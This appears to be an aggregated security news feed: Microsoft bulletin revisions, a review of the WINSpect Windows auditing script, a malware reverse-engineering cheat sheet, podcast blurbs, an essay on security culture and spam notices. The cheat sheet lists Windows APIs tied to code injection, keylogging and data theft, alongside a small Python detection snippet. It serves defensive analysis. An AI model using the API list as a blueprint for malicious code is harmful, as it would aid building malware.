Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.

MS16-123 – Important: Security Update for Windows Kernel-Mode Drivers (3192892) – Version: 3.0

Severity Rating: Important
Revision Note: V3.0 (September 12, 2017): Revised the Affected Software table to include Windows 10 Version 1703 for 32-bit Systems and Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-3376. Consumers using Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.

MS16-087 – Critical: Security Update for Windows Print Spooler Components (3170005) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (September 12, 2017): To address known issues with the 3170455 update for CVE-2016-3238, Microsoft has made available the following updates for currently-supported versions of Microsoft Windows: • Rereleased update 3170455 for Windows Server 2008 • Monthly Rollup 4038777 and Security Update 4038779 for Windows 7 and Windows Server 2008 R2 • Monthly Rollup 4038799 and Security Update 4038786 for Windows Server 2012 • Monthly Rollup 4038792 and Security Update 4038793 for Windows 8.1 and Windows Server 2012 R2 • Cumulative Update 4038781 for Windows 10 • Cumulative Update 4038781 for Windows 10 Version 1511 • Cumulative Update 4038782 for Windows 10 Version 1607 and Windows Server 2016. Microsoft recommends that customers running Windows Server 2008 reinstall update 3170455. Microsoft recommends that customers running other supported versions of Windows install the appropriate update. See Microsoft Knowledge Base Article 3170005 ( for more information.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow remote code execution if an attacker is able to execute a man-in-the-middle (MiTM) attack on a workstation or print server, or sets up a rogue print server on a target network.

MS16-095 – Critical: Cumulative Security Update for Internet Explorer (3177356) – Version: 3.0

Severity Rating: Critical
Revision Note: V3.0 (September 12, 2017): Revised the Affected Software table to include Internet Explorer 11 installed on Windows 10 Version 1703 for 32-bit Systems and Internet Explorer 11 installed on Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-3326. Consumers using Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Internet Explorer on Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability. Customers who are running other versions of Windows 10 and who have installed the June cumulative updates do not need to take any further action.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-039 – Critical: Security Update for Microsoft Graphics Component (3148522) – Version: 4.0

Severity Rating: Critical
Revision Note: V4.0 (September 12, 2017): Revised the Microsoft Windows affected software table to include Windows 10 Version 1703 for 32-bit Systems and Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-0165. Consumers running Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft .NET Framework, Microsoft Office, Skype for Business, and Microsoft Lync. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted document or visits a webpage that contains specially crafted embedded fonts.

Toolsmith Tidbit: Windows Auditing with WINspect

WINSpect recently hit the toolsmith radar screen via Twitter, and the author, Amine Mehdaoui, just posted an update a couple of days ago, so no time like the present to give you a walk-through. WINSpect is a PowerShell-based Windows Security Auditing Toolbox. According to Amine's GitHub README, WINSpect "is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. However, some of the functions still apply for standalone workstations."
The current script feature set includes audit checks and enumeration for:

  • Installed security products
  • World-exposed local filesystem shares
  • Domain users and groups with local group membership
  • Registry autoruns
  • Local services that are configurable by Authenticated Users group members
  • Local services for which corresponding binary is writable by Authenticated Users group members
  • Non-system32 Windows Hosted Services and their associated DLLs
  • Local services with unquoted path vulnerability
  • Non-system scheduled tasks
  • DLL hijackability
  • User Account Control settings
  • Unattended installs leftovers
I can see this useful PowerShell script coming in quite handy for assessment using the CIS Top 20 Security Controls. I ran it on my domain-joined Windows 10 Surface Book via a privileged PowerShell and liked the results.

The script confirms that it's running with admin rights, checks the PowerShell version, then inspects Windows Firewall settings. Looking good on the firewall, and WINSpect tees right off on my Windows Defender instance and its configuration as well.
Not sharing a screenshot of my shares or admin users, sorry, but you'll find them enumerated when you run WINSpect.

WINSpect then confirmed that UAC was enabled and that it should notify me only when apps try to make changes, then checked my registry for autoruns; no worries on either front, all confirmed as expected.

WINSpect wrapped up with a quick check of configurable services. SMSvcHost is normal as part of .NET, even if I don't like it, but flowExportService doesn't need to be there at all; I removed it a while ago after being really annoyed with it during testing. No user hosted services, and DLL Safe Search is enabled...bonus. Finally, no unattended install leftovers, and all the scheduled tasks are normal for my system. Sweet, pretty good overall, thanks WINSpect. :-)

Give it a try for yourself, and keep an eye out for updates. Amine indicates that Local Security Policy controls, administrative shares configs, loaded DLLs, established/listening connections, and exposed GPO scripts are on the to-do list.
Cheers...until next time.

Tips for Reverse-Engineering Malicious Code

This cheat sheet outlines tips for reversing malicious Windows executables via static and dynamic code analysis with the help of a debugger and a disassembler. To print it, use the one-page PDF version; you can also edit the Word version to customize it for your own needs.

Overview of the Code Analysis Process

  1. Examine static properties of the Windows executable for initial assessment and triage.
  2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.
  3. Perform automated and manual behavioral analysis to gather additional details.
  4. If relevant, supplement your understanding by using memory forensics techniques.
  5. Use a disassembler for static analysis to examine code that references risky strings and API calls.
  6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.
  7. If appropriate, unpack the code and its artifacts.
  8. As your understanding of the code increases, add comments, labels; rename functions, variables.
  9. Progress to examine the code that references or depends upon the code you’ve already analyzed.
  10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.

Common 32-Bit Registers and Uses

EAX Addition, multiplication, function results
ECX Counter; used by LOOP and others
EBP Baseline/frame pointer for referencing function arguments (EBP+value) and local variables (EBP-value)
ESP Points to the current “top” of the stack; changes via PUSH, POP, and others
EIP Instruction pointer; points to the next instruction; shellcode gets it via call/pop
EFLAGS Contains flags that store outcomes of computations (e.g., Zero and Carry flags)
FS F segment register; FS[0] points to SEH chain, FS[0x30] points to the PEB.

Common x86 Assembly Instructions

mov EAX,0xB8 Put the value 0xB8 in EAX.
push EAX Put EAX contents on the stack.
pop EAX Remove contents from top of the stack and put them in EAX.
lea EAX,[EBP-4] Put the address of variable EBP-4 in EAX.
call EAX Call the function whose address resides in the EAX register.
add esp,8 Increase ESP by 8 to shrink the stack by two 4-byte arguments.
sub esp,0x54 Shift ESP by 0x54 to make room on the stack for local variable(s).
xor EAX,EAX Set EAX contents to zero.
test EAX,EAX Check whether EAX contains zero, set the appropriate EFLAGS bits.
cmp EAX,0xB8 Compare EAX to 0xB8, set the appropriate EFLAGS bits.

Understanding 64-Bit Registers

  • Additional 64-bit registers are R8-R15.
  • RSP is often used to access stack arguments and local variables, instead of EBP.
  • |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| R8 (64 bits)
    ________________________________|||||||||||||||||||||||||||||||| R8D (32 bits)
    ________________________________________________|||||||||||||||| R8W (16 bits)
    ________________________________________________________|||||||| R8B (8 bits)

Passing Parameters to Functions

arg0 [EBP+8] on 32-bit, RCX on 64-bit
arg1 [EBP+0xC] on 32-bit, RDX on 64-bit
arg2 [EBP+0x10] on 32-bit, R8 on 64-bit
arg3 [EBP+0x14] on 32-bit, R9 on 64-bit

Decoding Conditional Jumps

JA / JG Jump if above/jump if greater.
JB / JL Jump if below/jump if less.
JE / JZ Jump if equal; same as jump if zero.
JNE / JNZ Jump if not equal; same as jump if not zero.
JGE / JNL Jump if greater or equal; same as jump if not less.

Some Risky Windows API Calls

  • Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses
  • Dynamic DLL loading: LoadLibrary, GetProcAddress
  • Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses
  • Data stealing: GetClipboardData, GetWindowText
  • Keylogging: GetAsyncKeyState, SetWindowsHookEx
  • Embedded resources: FindResource, LockResource
  • Unpacking/self-injection: VirtualAlloc, VirtualProtect
  • Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx
  • Execute a program: WinExec, ShellExecute, CreateProcess
  • Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile
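A first-pass triage for these indicators can be as simple as scanning a binary's bytes for the API names (step 2 of the process above). A minimal sketch, with the caveat noted in the comments that string presence is only a hint:

```python
RISKY_APIS = [
    b"CreateRemoteThread", b"WriteProcessMemory", b"VirtualAllocEx",
    b"SetWindowsHookEx", b"GetAsyncKeyState", b"InternetOpen",
    b"HttpSendRequest", b"ShellExecute", b"CreateProcess",
]

def triage_strings(data: bytes) -> list:
    # String presence is a triage hint, not proof of behavior:
    # imports can be resolved dynamically or obfuscated away entirely.
    return sorted({api.decode() for api in RISKY_APIS if api in data})

blob = b"\x00\x01GetAsyncKeyState\x00SetWindowsHookEx\x00padding"
assert triage_strings(blob) == ["GetAsyncKeyState", "SetWindowsHookEx"]
```

Here the co-occurrence of GetAsyncKeyState and SetWindowsHookEx would flag the sample for a closer look at possible keylogging, which is exactly the kind of lead the disassembler and debugger steps then confirm or refute.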

Additional Code Analysis Tips

  • Be patient but persistent; focus on small, manageable code areas and expand from there.
  • Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.
  • Look at jumps and calls to assess how the specimen flows from one “interesting” code block to another.
  • If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.
  • When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).


Authored by Lenny Zeltser with feedback from Anuj Soni. Malicious code analysis and related topics are covered in the SANS Institute course FOR610: Reverse-Engineering Malware, which they’ve co-authored. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

Enterprise Security Weekly #60 – Live From Gainesville

Don Pezet of ITProTV and Doug White join us to discuss network security architecture. In the news, SealPath and Boldon James join forces, following the money, AI in the cloud, and more on this episode of Enterprise Security Weekly! Full Show Notes: for all the latest episodes!

Quit Talking About "Security Culture" – Fix Org Culture!

I have a pet peeve. Ok, I have several, but nonetheless, we're going to talk about one of them today. That pet peeve is security professionals wasting time and energy pushing a "security culture" agenda. This practice of talking about "security culture" has arisen over the past few years. It's largely coming from security awareness circles, though it's not always the case (looking at you anti-phishing vendors intent on selling products without the means and methodology to make them truly useful!).

I see three main problems with references to "security culture," not the least of which being that it continues the bad old practices of days gone by.

1) It's Not Analogous to Safety Culture

First and foremost, you're probably sitting there grinding your teeth saying "But safety culture initiatives work really well!" Yes, they do, but here's why: safety culture can - and often does - achieve an outcome of zero incidents. That is to say, you can reduce safety incidents to ZERO. This is excellent for when you're around construction sites or going to the hospital. However, I have very bad news for you. Information (or cyber or computer) security will never get to zero incidents. Until the entirety of computing is revolutionized, removing humans from the equation, you will never prevent all incidents. Just imagine your "security culture" sign by the entrance to your local office environment, forever emblazoned with "It Has Been 0 Days Since Our Last Incident." That's not healthy or encouraging. That sort of thing would be outright demoralizing!

Since you can't be 100% successful through preventative security practices, you must then shift mindset to a couple things: better decisions and resilience. Your focus, which most of your "security culture" programs are trying to address (or should be), is helping people make better decisions. Well, I should say, some of you - the few, the proud, the quietly isolated - have this focus. But at the end of the day/week/month/year you'll find that people - including well-trained and highly technical people - will still make mistakes or bad decisions, which means you can't bank on "solving" infosec through better decisions.

As a result, we must still architect for resiliency. We must assume something will break down at some point, resulting in an incident. When that incident occurs, we must be able to absorb the fault and continue to operate despite degraded conditions, while recovering to "normal" as quickly, efficiently, and effectively as possible. Note, however, that this focus on resiliency doesn't really align well with the "security culture" message. It's akin to telling people "Safety is really important, but since we have no faith in your ability to be safe, here's a first aid kit." (Yes, that's a bit harsh, to prove a point, which hopefully you're getting.)

2) Once Again, It Creates an "Other"

One of the biggest problems with a typical "security culture" focus is that it once again creates the wrong kind of enablement culture. It says "we're from infosec and we know best - certainly better than you." Why should people work to make better decisions when they can just abdicate that responsibility to infosec? Moreover, since we're trying to optimize resiliency, people can go ahead and make mistakes, no big deal, right?

Part of this is ok, part of it is not. On the one hand, from a DevOps perspective, we want people to experiment, be creative, be innovative. In this sense, resilience and failure are a good thing. However, note that in DevOps, the responsibility for "fail fast, recover fast, learn fast" is on the person doing the experimenting!!! The DevOps movement is diametrically opposed to fostering enablement cultures where people (like developers) don't feel the pain from their bad decisions. It's imperative that people have ownership and responsibility for the things they're doing. Most "security culture" dogma I've seen and heard works against this objective.

We want enablement, but we don't want enablement culture. We want "freedom AND responsibility," "accountability AND transparency," etc, etc, etc. Pushing "security culture" keeps these initiatives separate from other organizational development initiatives, and more importantly it tends to have at best a temporary impact, rather than triggering lasting behavioral change.

3) Your Goal Is Improving the Organization

The last point here is that your goal should be to improve the organization and the overall organizational culture. It should not be focused on point-in-time blips that come and go. Additionally, your efforts must be aimed toward lasting impact and not be anchored around a cult of personality.

As a starting point, you should be working with org dev personnel within your organization, applying behavior design principles. You should be identifying what the target behavior is, then working backward in a piecemeal fashion to determine whether that behavior can be evoked and institutionalized through one step or multiple steps. It may even take years to accomplish the desired changes.

Another key reason for working with your org dev folks is because you need to ensure that anything "culture" that you're pursuing is fully aligned with other org culture initiatives. People can only assimilate so many changes at once, so it's often better to align your work with efforts that are already underway in order to build reinforcing patterns. The worst thing you can do is design for a behavior that is in conflict with other behavior and culture designs underway.

All of this is to underline the key point that "security culture" is the wrong focus, and can in some cases even detract from other org culture initiatives. You want to improve decision-making, but you have to do this one behavior at a time, and glossing over it with the "security culture" label is unhelpful.

Lastly, you need to think about your desired behavior and culture improvements in the broader context of organizational culture. Do yourself a favor and go read Laloux's Reinventing Organizations for an excellent treatise on a desirable future state (one that aligns extremely well with DevOps). As you read Laloux, think about how you can design for security behaviors in a self-managed world. That's the lens through which you should view things, and this is where you'll realize a "security culture" focus is at best distracting.

So... where should you go from here? The answer is three-fold:
1) Identify and design for desirable behaviors
2) Work to make those behaviors easy and sustainable
3) Work to shape organizational culture as a whole

Definitionally, here are a couple starters for you...

First, per Fogg, Behavior happens when three things come together: Motivation, Ability (how hard or easy it is to do the action), and a Trigger (a prompt or cue). When Motivation is high and it's easy to do, then it doesn't take much prompting to trigger an action. However, if it's difficult to take the action, or the motivation simply isn't there, you must then start looking for ways to address those factors in order to achieve the desired behavioral outcome once triggered. This is the basis of behavior design.

Second, when you think about culture, think of it as the aggregate of behaviors collectively performed by the organization, along with the values the organization holds. It may be helpful, as Laloux suggests, to think of the organization as its own person that has intrinsic motivations, values, and behaviors. Eliciting behavior change from the organization is, then, tantamount to changing the organizational culture.

If you put this all together, I think you'll agree with me that talking about "security culture" is anathema to the desired outcomes. Thinking about behavior design in the context of organizational culture shift will provide a better path to improvement, while also making it easier to explain the objectives to non-security people and to get buy-in on lasting change.

Bonus reference: You might find this article interesting as it pertains to eliciting behavior change in others.

Good luck!

QTUM Cryptocurrency spam

This spam email appears to have been sent by the Necurs botnet, advertising a new Bitcoin-like cryptocurrency called QTUM. Necurs is often used to push malware, pharma spam and dating spam, and sometimes stock pump-and-dump schemes. There is no guarantee that this is actually being sent by the people running QTUM; it could simply be a Joe Job intended to disrupt their operations. Given some of the wording alluding to illegal

Hack Naked News #139 – September 5, 2017

AT&T customers at risk, WikiLeaks gets vandalized, catching hackers in the act, going to jail over VPNs, and more. Jason Wood of Paladin Security discusses wheeling and dealing malware on this episode of Hack Naked News!

Full Show Notes:

Visit for all the latest episodes!

Malware spam: "Scanning" pretending to be from

This spam email pretends to be from but it is just a simple forgery leading to Locky ransomware. There is both a malicious attachment and a link in the body text. The name of the sender varies.

Subject: Scanning
From: "Jeanette Randels" []
Date: Thu, May 18, 2017 8:26 pm

Jeanette Randels

Startup Security Weekly #53 – Pulling Your G-String

Matt Alderman of Automox joins us. In the news, changing your audience’s perceptions, improving sales efforts, letting your kids fail, and updates from Facebook, Juniper, Qadium, and more on this episode of Startup Security Weekly!

Full Show Notes:

Visit for all the latest episodes!

QOTD – On Learning (New Things)

The further along you are in your career, the easier it is to fall back on the mistaken assumption that you’ve made it and have all the skills you need to succeed. The tendency is to focus all your energy on getting the job done, assuming that the rest will take care of itself. Big mistake.
The primary takeaway from Dweck’s research is that we should never stop learning. The moment we think that we are who we are is the moment we give away our unrealized potential.
The act of learning is every bit as important as what you learn. Believing that you can improve yourself and do things in the future that are beyond your current possibilities is exciting and fulfilling.
-- Dr. Travis Bradberry, Coauthor of Emotional Intelligence 2.0 & President at TalentSmart

Src: These are the skills you should learn that will pay off forever | World Economic Forum

Paul’s Security Weekly #528 – DDos Campaign for Memes

Larry Pesce and Dave Kennedy hold down the fort in Paul’s absence! Kyle Wilhoit of DomainTools delivers a tech segment on pivoting off domain information, Dave talks about the upcoming DerbyCon, and we discuss the latest information security news!

Full Show Notes:

Visit for all the latest episodes!